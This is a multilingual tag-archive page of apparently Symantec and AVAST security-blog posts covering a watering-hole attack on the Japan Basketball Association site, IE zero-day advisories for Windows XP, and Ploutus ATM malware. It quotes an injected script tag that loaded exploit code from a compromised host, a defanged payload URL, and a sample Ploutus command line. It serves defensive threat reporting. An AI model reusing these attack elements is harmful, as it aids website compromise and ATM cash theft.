Tag Archives: windows xp

IE ???????????????????????????Operation Backdoor Cut?

今年 3 月、シマンテックは Internet Explorer 8 のゼロデイ脆弱性、「Microsoft Internet Explorer のメモリ破損の脆弱性(CVE-2014-0324)」を悪用した水飲み場型攻撃の可能性についてブログでお伝えしました。シマンテックはこの攻撃について調査を続け、この攻撃の目的が日本のバスケットボール界に関係のあるユーザーを狙うことにあったと結論付け、これを「Operation Backdoor Cut(オペレーションバックドアカット)」と命名しました。こうした結論を導き出すことができたのは、長期にわたり観測した結果、この脆弱性を悪用した水飲み場型攻撃が、日本バスケットボール協会(JBA)の公式サイトのランディングページだけをホストとして利用していることが判明したためです。3 月にこのゼロデイ脆弱性が確認されて以降、シマンテックの遠隔測定では、これ以外の Web サイト上で攻撃は確認されていません。

figure1_21.png
図 1. JBA のランディングページ

JBA の Web サイトが最初に侵害されたのは 2 月中旬のことです。サイトの HTML コードに悪質なスクリプトがインジェクトされ、このスクリプトによってバックグラウンドで外部サイトから悪用コードがロードされていました。その後、このサイトは正常化されたように見えましたが、2 月下旬には再び侵害され、同様のスクリプトがインジェクトされました。そして、3 月 11 日にマイクロソフト月例パッチとして CVE-2014-0324 に対するパッチがリリースされてからわずか数時間後に、三たび悪質なスクリプトがインジェクトされます。この 3 回とも、JBA サイトにインジェクトされたのは、悪用コードをホストしている、さらに別の侵害された Web サイトにトラフィックをリダイレクトするための短いスクリプトです。この Web サイトの所在地は韓国のソウルです。この攻撃で使われているスクリプトの例を次に示します。

<script type=”text/javascript” src=”https://www.[削除済み].kr/uc/inc_jba.php”></script>

侵害されて実際に悪用コードをホストしていたのは、韓国の大手カフェチェーンに関連する Web サイトです。3 回の侵入のたびに、このサイトの別々のディレクトリにファイルが保存されていました。このサイトが、攻撃のメイン部分のホストとして選ばれたのは、著名な企業のサイトであり、企業のネットワークを監視しているセキュリティ製品やサービスから嫌疑をかけられる可能性が低いためでしょう。各ディレクトリに含まれるファイルは、以下のとおりです。

  • inc_jba.php
  • inc_front_us-en.php
  • inc_front_ja-jp.php
  • inc_front-2007.php
  • inc_front-2010.php
  • inc-module.jpg

JBA の Web サイトにインジェクトされた短いスクリプトによって、inc_jba.php ファイルに誘導されます。このファイルには、標的となったユーザーのコンピュータ環境(オペレーティングシステム(OS)のバージョン、OS の言語、インストールされている Microsoft Office のバージョンなど)の情報をチェックする JavaScript が含まれています。この JavaScript は、cookie をチェックとして使う前に、ブラウザがこのページにアクセスしたことがあるかどうかも確認します。過去にアクセスしたことがある場合、ブラウザは悪用コードに誘導されません。これは、ユーザーがセキュリティ研究者である場合を警戒した対策です。コンピュータ環境が、指定された条件を満たしている場合、ブラウザは 4 つの悪用ページのいずれかにリダイレクトされます。悪用コードは、環境に応じて次の 4 つの亜種が用意されています。

  • Windows XP – 英語(EN)
  • Windows XP – 日本語
  • x86 コンピュータの Windows 7 に Office 2007 がインストール
  • x86 コンピュータの Windows 7 に Office 2010 がインストール

実行に成功すると、悪用コードは同じディレクトリから inc_module.jpg をダウンロードして実行し、最終的なペイロードの URL を取得します。拡張子は .jpg ですが、これは画像ファイルではなく、実際にはペイロードの場所について暗号化された情報を含むデータファイルです。ブラウザは、ソウルにある別のサーバーにリダイレクトされますが、これは攻撃者が SSL プロトコルでネットワークトラフィックを暗号化して用意したものと考えられます。ソウルに置かれているサーバーの URL は以下のとおりです。

https://login[ドット]imicrosoft[ドット]org/feed

このサイトが、北京に拠点を置く企業によってレンタルされている仮想プライベートサーバー(VPS)上で管理されていた点は注目に値します。この企業は、米国と韓国にある VPS を提供することを業務にしているようです。このプロバイダが選ばれたのは、サーバーの位置情報によるものと思ってまず間違いないでしょう。ペイロードをホストしているサーバーの Geo-IP 位置情報が、攻撃の成否を左右したはずだからです。

figure2_20.png
図 2. VPS サイトのログイン画面

攻撃者は、早々に撤収して短期間で攻撃活動を終わらせる戦略を取ったか、あるいはセキュリティ研究者がペイロードをダウンロードできないようにする高度な侵入手法を編み出したか、いずれかだったと考えられます。いずれにしても、このサーバーからペイロードを取得することはできませんでした。

シマンテックが確認した限りでは、「Operation Backdoor Cut」の動機は JBA を水飲み場サイトとして利用して、そこからのトラフィックを誘導することだけだと思われます。なぜなら、他の Web サイトはまったく影響を受けていないからです。悪質なスクリプトファイルの名前(inc_jba.php)と、ページへのアクセスカウントに使われた cookie の名前(JBA20140312v2)は、どちらも JBA ページの一部であるかのように偽装されています。シマンテックがこの悪用について確認した検出結果はすべて、JBA の Web サイトからのトラフィックでした。

バスケットボール界が狙われた理由
なぜ日本のバスケットボール界が今回の標的になったのか不思議に思う方もいるでしょう。スポーツ界は国民とも政府とも深く結び付いており、バスケットボールもその例外ではありません。日本のバスケットボール界と日本政府との間には、いささか興味深い関係があります。JBA の会長は、日本の現副総理兼財務大臣です。しかも、元総理大臣でもあります。このような関係こそ、JBA サイトに水飲み場型攻撃が仕掛けられた動機かもしれません。つまり、JBA の Web サイトが、日本政府への格好の侵入口またはゲートウェイと見なされたのかもしれません。

オリンピックが動機という可能性もあります。主要なスポーツ団体のひとつである JBA は、2020 年東京オリンピックの統括機関である東京オリンピック・パラリンピック競技大会組織委員会と密接な関係があります。オリンピック関連組織が頻繁にサイバースパイ活動の標的になることは、よく知られています。たとえば 2011 年、「Operation Shady RAT」と命名された攻撃を調査したときのデータでも、いくつかのオリンピック関連組織が攻撃を受け、そのネットワークのコンピュータが侵入を受けたことが判明しています。日本オリンピック委員会(JOC)も、このとき被害を受けました。日本は昨年、2020 年のオリンピック開催地に選ばれ、現在その準備を進めています。オリンピック開催地という名誉と引き換えにサイバー攻撃が増える可能性については、日本でも十分に認識されています。実際、日本政府は今から 6 年後に開催されるオリンピック大会に備えて、サイバーセキュリティ演習を 3 月に実施したところです。しかし、攻撃はすでに始まっているかもしれず、この演習よりも前にとっくに始まっていた可能性すらあります。

政府機関、製造業、金融などの業種は標的になりやすいと言えますが、標的型攻撃を受けるリスクはどの業種でも変わりません。そのことを認識して、相応にネットワークを保護することが重要です。企業や組織は、準備を怠らず、万一ネットワークに攻撃者の侵入を許してしまった場合の対策を講じておく必要があります。

シマンテックは、「Microsoft Internet Explorer のメモリ破損の脆弱性(CVE-2014-0324)」から保護するために、以下の検出定義ファイルを提供しています。

ウイルス対策

侵入防止システム

 

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。

Operation Backdoor Cut Targeted Basketball Community with IE Zero-Day

Back in March, Symantec blogged about a possible watering hole campaign exploiting a zero-day vulnerability for Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). We continued our investigation into this attack, which we dubbed Operation Backdoor Cut, and have concluded that the focus of the attack was to target users associated with the Japanese basketball community. We drew this conclusion from our extended observation of the watering hole campaign abusing the vulnerability being solely hosted on the landing page of the official Japan Basketball Association (JBA) website. No other attacks on any other websites have been confirmed from our telemetry since the disclosure of the zero-day attack in March.

figure1_21.png
Figure 1. JBA landing page

The JBA website was originally compromised in mid-February to host a malicious script in the site’s HTML code that loaded exploit code from an external site in the background. The site appeared to be cleaned up afterwards; however, it was compromised again in late February to host a similar script. Then, yet again, malicious script was inserted just hours after the release of the patch for CVE-2014-0324 on Microsoft Patch Tuesday back on March 11. In all three occasions, a short script was inserted in the JBA site in order to redirect traffic to another compromised website hosting the exploit code located in Seoul, South Korea. The following is an example of the script used in the attacks:

<script type=”text/javascript” src=”https://www.[REMOVED].kr/uc/inc_jba.php”></script>

The compromised website, associated with a major Korean Café chain, hosted the actual exploit code. In each of the three compromises, the files were stored in different directories on the site. This particular site was most likely chosen to host the main part of the attack due to it being a reputable business which would not be likely to draw suspicion from security products or services monitoring the organization’s network. The following is a list of the files contained in each directory:

  • inc_jba.php
  • inc_front_us-en.php
  • inc_front_ja-jp.php
  • inc_front-2007.php
  • inc_front-2010.php
  • inc-module.jpg

The short script inserted into the JBA website led to the file inc_jba.php. This file contains JavaScript that checks the targeted user’s computer environment things such as the operating system (OS) version, which Microsoft Office version is installed, and the language of the OS. The JavaScript also checks if the browser has ever visited the page before by using a cookie as a check. If the page has been visited before, the browser is not directed to the exploit code as a precaution in case the user is a security researcher. If the environment meets the specified conditions, the browser is redirected to one of four exploit pages. Each of the four variations of the exploit code has been prepared for different environments:

  • Windows XP – English (EN)
  • Windows XP – Japanese
  • Windows 7 with Office 2007 on a x86 computer
  • Windows 7 with Office 2010 on a x86 computer

If the exploit code is executed successfully, it downloads inc_module.jpg from the same directory and renders the file to acquire the URL of the ultimate payload. Although the file extension is .jpg, it is not an image file, but is actually a data file containing encrypted information about the location of the payload. The browser then redirects to another server located in Seoul, which we believe was prepared by the attacker using the SSL protocol to encrypt network traffic. The following is the URL of the Seoul-based server:

https://login[dot]imicrosoft[dot]org/feed

Interestingly, this site was maintained on a virtual private server (VPS) rented from a company located in Beijing that appears to specialize in providing VPS located in the Unites States and South Korea. It may be safe to assume that the provider was chosen because of the geo-location of the server. The geo-IP location of the server hosting the payload must have been vital to the campaign’s success.

figure2_20.png
Figure 2. Login screen of the VPS site

The attackers had either a strategy to close shop quickly to make their campaign short lived or some sophisticated evasion technique was implemented to prevent security researchers from downloading the payload. Either way, we were unable to acquire the payload from this server.

From our observations, we believe the motive of Operation Backdoor Cut was to solely draw traffic from the JBA watering hole site as no other websites appear to have been affected. The name of the malicious script file (inc_jba.php) and the name of the cookie (JBA20140312v2) used to count the number of accesses to the page, both disguise themselves to appear as part of the JBA page. Traffic from the JBA website accounted for all detections observed by Symantec for this exploit.

Targeting the Basketball Community
Some may wonder why the Japanese basketball community is being targeted. The sporting community has important ties with both the nation and its government and basketball is no different. The Japanese basketball community has a rather interesting connection with the Japanese government. The president of the JBA is the current Deputy Prime Minister and Minister of Finance in Japan. He also happens to be the former prime minister. A link such as this may perhaps be the motive for the watering hole attack on the JBA site. The website may have been considered a good entry point or gateway to the Japanese government.

The Olympics may be another motive. As a major sports organization, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games which is the organizing body of the Tokyo 2020 Olympics. It’s no secret that Olympic organizations are often targets of cyberespionage. For instance, data retrieved from an investigation in 2011 into an operation named Shady RAT revealed that several Olympic organizations were attacked and computers on their network were compromised; the Japan Olympic Committee (JOC) happened to be one of the victims. Last year, Japan won the bid for Tokyo to host the Olympic Games in 2020 and is now preparing for the event. The nation is well aware of the potential for cyberattacks when it comes to the prestigious event. The Japanese government, in fact, held a cybersecurity drill in March in preparation for the Olympics to be held six years from now. However, the attacks may have already begun and may have started long before this exercise was launched.

Sectors including government, manufacturing, and finance may be common targets; however, any industry could potentially be at risk of a targeted attack. It is important to realize this and protect networks accordingly. Organizations should be prepared and draw up plans in case attackers happen to intrude the network.

Symantec has the following protection in place to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):

AV

IPS

Microsoft issues patch for Internet Explorer (and Windows XP too!)

We informed you a few days ago about a new vulnerability in Microsoft’s Internet Explorer, which allows attackers to execute code remotely, ultimately giving them full control over your PC. The vulnerability targets Internet Explorer versions 6 through 11. AVAST took immediate action and issued a new definition update which addresses this specific vulnerability and […]

Vulnerabilidade de Dia-Zero do Internet Explorer está a Solta

zero_day_IE_concept.png

A Symantec está ciente dos relatórios de vulnerabilidade de Dia Zero, Vulnerabilidade de Execução de Código Remoto para Microsoft Internet Explorer (CVE-2014-1776), que afeta todas as versões do Internet Explorer.

A Microsoft publicou um aviso de segurança sobre a vulnerabilidade no Internet Explorer, que está sendo utilizada em limitados ataques dirigidos. Atualmente não existe nenhum patch disponível para esta vulnerabilidade e a Microsoft, até o momento em que este texto foi escrito, não ofereceu uma data de divulgação desta correção.

Nossos testes confirmaram que a vulnerabilidade afeta o Internet Explorer do Windows XP. Esta é a primeira vulnerabilidade de Dia-Zero que não será corrigida para os usuários do Windows XP, pois a Microsoft encerrou o suporte deste sistema operacional em 8 de abril de 2014. No entanto, a Microsoft afirmou que o seu avançado kit de ferramentas de Mitigação (EMET) 4.1 e acima poderá mitigar essa vulnerabilidade do Internet Explorer que é suportado pelo Windows XP. Além de usar o EMET, a Symantec incentiva os usuários a mudarem temporariamente para um navegador da Web diferente até que uma correção seja disponibilizada pelo fornecedor.

Symantec protege os clientes contra este ataque, com as seguintes detecções:

Nós vamos atualizar este blog com mais informações assim que estiverem disponíveis.

Atualização – 28 de Abril

Com a finalidade de reduzir a Vulnerabilidade de Execução de Código Remoto para Microsoft Internet Explorer (CVE-2014-1776) , a Symantec ofrece as seguintes recomendações

A Microsoft declarou que versões do avançado kit de ferramentas de Mitigação (EMET) 4.1 e superiores podem atenuar essa vulnerabilidade no Internet Explorer. O kit de ferramentas está disponível para usuários do Windows XP também. Se a utilização do EMET não for uma opção, os usuários podem considerar como forma de reduzir o problema anulando o registro de um arquivo DLL chamado VGX.DLL. Este arquivo provê suporte para VML (Vector Markup Language) no navegador. Essa ação não é necessária para a maioria dos usuários. No entanto, ao anular o registro da Library qualquer aplicação que utilize DLL não funcionará de maneira apropriada. Igualmente, algumas aplicações potencialmente instaladas no sistema podem se registrar no DLL. Com isso em mente, a seguinte linha de instruções pode ser executada para tornar imune o sistema de ataques que tentem explorar esta vulnerabilidade. Esta linha de recomendações pode ser usada para todos os sistemas operativos afetados.

“%SystemRoot%\System32\regsvr32.exe” -u “%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll”

Nós também desenvolvemos um arquivo de lote que pode ser utilizado para executar a tarefa para aqueles que necessitem administrar grandes infra-estruturas de TI.

bat_icon.png

Nota: Os usuários terão de renomear o arquivo usando uma extensão .bat

O arquivo de lote tem a capacidade de verificar o estado atual do arquivo DLL e cancelar o registro da DLL, conforme necessário. O roteiro descrito no arquivo de lote é muito simples e pode ser usado como uma base para customizar o código para atender às necessidades de certos ambientes de sistema.

Apesar de nenhuma ferramenta especial ser necessária para atenuar essa vulnerabilidade, por favor note que as recomendações, como as fornecidas aqui, podem não ser as mesmas possíveis para vulnerabilidades futuras. Recomendamos que os sistemas operacionais não suportados, como o Windows XP, sejam substituídos por versões atualizadas, logo que possível.

Vulnerabilidad Día Cero de Internet Explorer Puesta al Descubierto

zero_day_IE_concept.png

Symantec está al tanto de los reportes de la vulnerabilidad de Día Cero, Vulnerabilidad de Ejecución de Código Remoto para Microsoft Internet Explorer, que afecta todas las versiones de Internet Explorer.

Microsoft dio a conocer un aviso de seguridad referente a una vulnerabilidad en Internet Explorer que está siendo empleada en limitados ataques dirigidos. Actualmente no existe un parche disponible para esta vulnerabilidad y Microsoft, hasta el momento que este texto fue escrito, no ha proporcionado una fecha de lanzamiento para uno.

Nuestras pruebas confirman que la vulnerabilidad afectó Internet Explorer en Windows XP. Ésta es la primera vulnerabilidad de Día Cero que no será arreglada para los usuarios de Windows XP, pues Microsoft concluyó el soporte para este sistema operativo el pasado 8 de abril de 2014. Sin embargo, Microsoft informó que su Kit de herramientas de Experiencia de mitigación mejorada (EMET, por sus siglas en inglés) 4.1 y superior podrá mitigar esta vulnerabilidad de Internet Explorer y es compatible con Windows XP.

Symantec Security Response recomienda a los usuarios, adicionalmente al uso de EMET, cambiar temporalmente por un navegador diferente hasta que el parche se encuentre disponible por parte del proveedor. Symantec protege a sus clientes contra este ataque con las siguientes detecciones:

Mantendremos actualizado este blog con información adicional tan pronto esté disponible.

Actualización – 28 de abril de 2014

Con la finalidad de reducir la Vulnerabilidad de Ejecución de Código Remoto para Microsoft Internet Explorer (CVE-2014-1776), Symantec brinda las siguientes recomendaciones.

Microsoft declaró que las versiones del Kit de herramientas de Experiencia de mitigación mejorada (EMET, por sus siglas en inglés) 4.1 y superior podrá disminuir esta vulnerabilidad de Internet Explorer. El kit de herramientas también está disponible para los usuarios de Windows XP. Si el uso de EMET no es una alternativa, los usuarios pueden considerar reducir el problema anulando el registro a un archivo DLL llamado VGX.DLL. Este archivo provee soporte para VML (Vector Markup Language) en el navegador. Esto no es necesario para la mayoría de los usuarios. No obstante al anular el registro del library cualquier aplicación que utilice DLL no funcionará apropiadamente. Igualmente, algunas aplicaciones instaladas en el sistema potencialmente pueden regresar el registro al DLL. Con esto en mente, la siguiente línea de instrucciones puede ser ejecutada para volver inmune al sistema de ataques que intenten explotar la vulnerabilidad. Esta línea de instrucciones puede ser usada para todos los sistemas operativos afectados:

“%SystemRoot%\System32\regsvr32.exe” -u “%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll”

También hemos desarrollado un archivo de lote que puede ser usado para llevar a cabo la tarea de aquellos que requieran administrar infraestructuras de TI más grandes.

bat_icon.png

Nota: Los usuarios necesitarán renombrar el archivo usando una extensión .bat

El archivo de lotes tiene la habilidad de verificar el estado actual del archivo DLL y de remover el registro de DLL como se requiere. La secuencia de comandos descrita en el lote de archivos es muy simple y se puede utilizar como base para personalizar el código y  adaptarse a las necesidades de ciertos entornos de sistema.

Aunque no son necesarias herramientas especiales en particular para mitigar esta vulnerabilidad, por favor tome en cuenta que las recomendaciones, como las proporcionadas aquí, pueden que no sean útiles para futuras vulnerabilidades. Recomendamos que los sistemas operativos sin soporte, como Windows XP, sean reemplazados por versiones con soporte tan pronto sea posible.

Internet Explorer users: AVAST has got your back – for FREE

AVAST protects users running Internet Explorer. Microsoft announced a new vulnerability in Internet Explorer, which allows attackers to execute code remotely, ultimately giving them full control over a PC. The vulnerability targets Internet Explorer versions 6 through 11 and was published under the name CVE-2014-1776. Out of all the Internet Explorer users, Windows XP users […]

??? ??? ???? ???? Internet Explorer ???

zero_day_IE_concept.png

시만텍은 모든 버전의 Internet Explorer에 영향을 미치는 제로데이 취약점인 Microsoft Internet Explorer 원격 코드 실행 취약점(CVE-2014-1776)이 보고되고 있음을 확인했습니다.

Microsoft는 일부 표적 공격에 이용되고 있는 Internet Explorer의 취약점에 대한 보안 권고를 발표했습니다. 현재 이 취약점에 대한 패치는 없으며, 이 글의 작성 시점에는 Microsoft에서 패치 발표일을 밝히지 않은 상태입니다.

시만텍의 테스트에 따르면, 이 취약점은 Windows XP의 Internet Explorer에서 문제를 일으킵니다. Microsoft에서 2014년 4월 8일 자로 이 운영 체제에 대한 지원을 종료한 가운데 이번 취약점은 Windows XP 사용자에게 패치가 제공되지 않은 최초의 제로데이 취약점입니다. Microsoft는 자사의 EMET(Enhanced Mitigation Experience Toolkit) 4.1 이상으로 이 Internet Explorer 취약점을 완화할 수 있으며 해당 툴킷이 Windows XP에서 지원된다고 밝힌 바 있습니다. 시만텍 보안 연구소는 사용자에게 EMET를 사용하면서 벤더가 패치를 제공할 때까지 임시로 다른 웹 브라우저를 사용할 것을 권장합니다.

시만텍은 아래와 같은 탐지 활동을 통해 이 공격으로부터 고객을 보호합니다.

추가 정보가 입수되는 대로 이 블로그를 통해 게시하겠습니다.

업데이트 – 2014년 4월 28일:

Microsoft Internet Explorer 원격 코드 실행 취약점(CVE-2014-1776)을 완화하기 위한 시만텍 권장 사항은 아래와 같습니다.

Microsoft에 따르면, EMET(Enhanced Mitigation Experience Toolkit) 4.1 이상 버전을 사용하여 이 Internet Explorer의 취약점을 완화할 수 있습니다. 이 툴킷은 Windows XP 사용자도 이용 가능합니다. EMET를 사용하기 어려운 경우 VGX.DLL이라는 DLL 파일을 등록 취소하는 방법으로 이 문제를 완화할 수 있습니다. 이 파일은 해당 브라우저에서 VML(Vector Markup Language)을 지원합니다. 대부분의 사용자는 이 방법을 사용할 필요가 없습니다. 하지만 라이브러리의 등록을 취소할 경우 이 DLL을 사용하는 애플리케이션이 더 이상 정상적으로 작동하지 않을 수 있습니다. 또한 시스템에 설치된 일부 애플리케이션에서 이 DLL을 다시 등록할 가능성도 있습니다. 이러한 사항을 고려하여 이 취약점을 노리는 공격으로부터 시스템을 보호하기 위해 아래의 한 줄짜리 명령어를 실행할 수 있습니다. 이 명령어는 해당 취약점의 영향을 받는 모든 운영 체제에서 사용할 수 있습니다.

“%SystemRoot%\System32\regsvr32.exe” -u “%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll”

시만텍은 대규모 IT 인프라스트럭처를 관리해야 하는 고객을 위해 배치 파일을 개발했습니다.

bat_icon.png

참고: 사용자는 .bat 확장자를 사용하여 파일 이름을 변경해야 합니다.

이 배치 파일은 DLL 파일의 현재 상태를 확인하고 필요한 경우 DLL을 등록 취소하는 기능을 수행합니다. 배치 파일의 스크립트는 매우 간단하며 이를 바탕으로 특정 시스템 환경의 요구 사항에 맞게 코드를 커스터마이즈할 수 있습니다.

이 취약점을 완화하는 데 특별한 툴이 필요한 것은 아니지만, 향후 발견될 취약점에 대해서는 여기서 소개한 것과 같은 권장 사항의 적용이 불가능할 수 있습니다. 따라서 Windows XP와 같이 지원되지 않는 운영 체제는 가급적 빨리 지원되는 버전으로 대체하는 것이 좋습니다.

 

Update – May 02, 2014:
Microsoft has released an out-of-band security update to address this vulnerability. For more information, see the following Microsoft security advisory:

Out-of-Band Release to Address Microsoft Security Advisory 2963983

So you’re sticking to Windows XP? Here’s how to protect yourself.

It’s the end of Microsoft support, not the end of the world. For more than a year, Microsoft informed and reminded users to upgrade from Windows XP before their support expired. They warned users that they would be subject to “zero-day” threats forever more. But, even with all that, nearly 30 percent of internet-connected PCs continue to […]

Windows XP users sticking to the OS despite support cutoff

The majority of AVAST customers running Windows XP said they will rely on AVAST to protect them.   Last month Ondrej Vlcek, Chief Operating Officer of AVAST, shared his opinion on the end of Windows XP support by Microsoft, revealing that 23.6% of AVAST’s over 200 million users were still using Windows XP. Since then […]

ATM ?? SMS ???????????????????????

      No Comments on ATM ?? SMS ???????????????????????

daniel_blof_header_image_cropped.png

企業に対しても一般家庭ユーザーに対しても、サポート終了間近の Windows XP 環境をそれ以降のバージョンにアップグレードするよう求める声は日増しに大きくなっています。機能強化が必要ないとしても、セキュリティとサポートのために必須のアップグレードです。ATM も基本的には、現金へのアクセスを制御するコンピュータであり、ATM の 95% 近くは Windows XP 上で稼働していることがすでに知られています。2014 年 4 月 9 日に予定されている Windows XP のサポート終了を目前に控えた今、金融機関は ATM を標的とするサイバー攻撃の深刻な危機に直面しています。しかも、これは仮想危機などではありません。現実に起こっている危機であり、サイバー犯罪者が ATM を狙う手口はますます巧妙になっています。

2013 年 10 月には、このブログでもお伝えしたとおり、新しい ATM マルウェアがメキシコで確認されており、攻撃者は外付けキーボードを使って ATM から自由に現金を引き出していました。この脅威は、Backdoor.Ploutus と命名されています。その数週間後には、このマルウェアがモジュール式のアーキテクチャへと進化したことを示す新しい亜種も発見されました。この新しい亜種は英語版にもローカライズされており、作成者が活動範囲を他の国や地域にも広げつつあることを示唆しています。新しい亜種は Backdoor.Ploutus.B として検出されます(このブログでは一貫して「Ploutus」と呼びます)。

Ploutus のこの亜種で特徴的なのは、侵入先の ATM に SMS を送信するだけで、サイバー犯罪者は ATM を使って現金を払い戻すことができたという点です。信じられないかもしれませんが、この手口は今でも世界中の至るところで使われています。

今回は、この手口がどのように機能するのかを紹介します。

ATM_blog_infographic_fig1.png
図 1. 攻撃者が携帯電話を使って ATM から現金を引き出す手口

携帯電話から ATM に接続
攻撃者は、ATM の内部に接続した携帯電話を使って ATM をリモートで制御します。携帯電話を ATM に接続する方法はいくつかありますが、一般的なのは USB テザリングと呼ばれる設定を使う方法です。実質的には、携帯電話とコンピュータ(この場合は ATM)との間で共有インターネット接続が確立されることになります。

ATM に Ploutus を感染させるには、攻撃者が携帯電話を正しく設定し、ATM に接続する必要があります。必要な手順がすべて完了すると、完全な双方向接続が確立され、携帯電話の準備が整います。

携帯電話は USB ポートを介して ATM に接続されているので、電力もその接続から供給され、携帯電話本体が充電されます。このため、携帯電話は電源の入った状態を無限に維持できます。

ATM に SMS メッセージを送信
携帯電話を ATM に接続し、設定が完了すると、攻撃者は ATM 内部に接続された携帯電話に特定の SMS コマンドメッセージを送信できるようになります。所定の形式の新しいメッセージを検出すると、携帯電話はそのメッセージをネットワークパケットに変換し、USB ケーブルを通じて ATM に転送します。

このマルウェアにはネットワークパケットモニター(NPM)のモジュールがあり、パケット盗聴の機能を果たして、ATM に向かうすべてのネットワークトラフィックを監視します。侵入先の ATM が有効な TCP パケットまたは UDP パケットを携帯電話から受信すると、NPM がそのパケットを解析し、パケット内の特定のオフセットで「5449610000583686」という数字を探します。データのパッケージ全体を処理することが目的です。この特定の数字が見つかると、NPM は次の 16 桁を読み込み、それを使って Ploutus 実行のコマンドラインを作成します。このコマンドは、たとえば次のような形式になります。

cmd.exe /c PLOUTOS.EXE 5449610000583686=2836957412536985

以前のバージョンの Ploutus では、主犯格がこの数字をマネーミュール(送金仲介人)と共有する必要がありました。そのため、万一マネーミュールがこの数字の意味に気づいた場合には、主犯格の人物から金銭を詐取できる可能性がありました。今回のバージョンでは、16 桁の数字がマネーミュールには見えないため、主犯格はセキュリティの強化を図ることができ、現金の引き出しを一括管理できるようになっています。この数字の有効期限は 24 時間です。

SMS メッセージを使って ATM をリモートで制御する方法は、離れたところからほとんど瞬時に成功するため、この犯罪に関与する誰にとってもはるかに便利です。主犯格は、マネーミュールが引き出す金額を正確に把握でき、マネーミュールは現金が出てくるまで長時間 ATM の付近にとどまっている必要がありません。主犯格とマネーミュールが動作を同期させていれば、マネーミュールが現金を払い戻す振りをするか、単に ATM の前を通り過ぎるだけで、現金を引き出すことができます。

攻撃全体の流れ
この攻撃が機能する細かい手口は以上に見たとおりなので、これが全体としてどのように機能するのか概要を見てみましょう。

ATM_attack_ploutus_attack_overview_fig2.png
図 2. Ploutus による ATM 攻撃の概要

プロセスの概要

  1. 攻撃者は ATM に Ploutus をインストールし、USB ケーブルを使って携帯電話を ATM に接続します。
  2. コントローラにより、2 通の SMS メッセージが ATM 内部の携帯電話に送信されます。
    1. 1 通目の SMS には、ATM で Ploutus を起動する有効なアクティブ化 ID が含まれています。
    2. 2 通目の SMS には、現金を引き出すための有効な払い戻しコマンドが含まれています。
  3. 有効な SMS メッセージの着信を検出した携帯電話は、TCP パケットまたは UDP パケットとしてそれを ATM に転送します。
  4. ATM 内部では、ネットワークパケットモニターモジュールが TCP/UDP パケットを受信し、それに有効なコマンドが含まれていれば Ploutus を実行します。
  5. Ploutus によって ATM から現金が引き出されます。払い戻される現金の額は、マルウェア内部であらかじめ設定されています。
  6. マネーミュールによって ATM から現金が回収されます。

シマンテックは、Ploutus に感染した実際の ATM を使って、この攻撃を実験的に再現することに成功しました。この攻撃が成功する様子を短い動画でご確認いただけます。

Default Chromeless Player

このデモ動画では Ploutus マルウェアを使っていますが、シマンテックセキュリティレスポンスでは、同じように ATM を標的とする別種のマルウェアもいくつか確認しています。Ploutus の場合、攻撃者は ATM 内部から現金を盗み出そうとしていますが、シマンテックが解析した一部のマルウェアでは、別の悪質なソフトウェアを使って中間者攻撃を仕掛けている間に、顧客のキャッシュカード情報と暗証番号を盗もうとします。ATM から現金を引き出すといっても、最も有効な方法という点では攻撃者によって考え方も違うようです。

ATM を保護するために何ができるか
最近の ATM は、ハードディスクドライブの暗号化などによってセキュリティ機能が強化されているため、こうした侵入の手口も防ぐことができます。しかし、依然として Windows XP 上で動作している旧型の ATM の場合、特にそれがありとあらゆる遠隔地にすでに設置されているとなると、Ploutus のような攻撃を防ぐことはかなり困難です。また、ATM の内部にあるコンピュータの物理的なセキュリティに対処が必要という別の問題点もあります。ATM 内の現金は金庫で厳重に保管されていますが、コンピュータはそうではないためです。旧型の ATM で物理的なセキュリティがこのように不十分な場合、攻撃者はそれだけ有利になります。

犯罪者にとっての難易度を高くするためには、以下のようにさまざまな対策が考えられます。

  • Windows 7 や Windows 8 など、サポートされているオペレーティングシステムにアップグレードする。
  • 物理的に十分な保護を実施し、ATM に監視カメラの設置を検討する。
  • CD-ROM や USB ドライブなど、許可されていないメディアから起動できないように BIOS の機能を制限する。
  • ディスク全体暗号化ソフトウェアを使って、ディスクの改変を防ぐ。
  • Symantec Data Center Security: Server Advanced(旧称、Critical System Protection)などのシステム保護ソリューションを使う。

こうした対策をすべて実施すれば、内部に共犯者がいないかぎり、攻撃者が ATM に侵入することはかなり難しくなります。

シマンテックのコンシューマ向け保護、エンドポイント保護、サーバー保護の各ソリューションは、当面の間 Windows XP を引き続きサポートしますが、Windows XP をお使いの場合には、できるだけ速やかに新しいオペレーティングシステムにアップグレードすることをお勧めします。

 

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。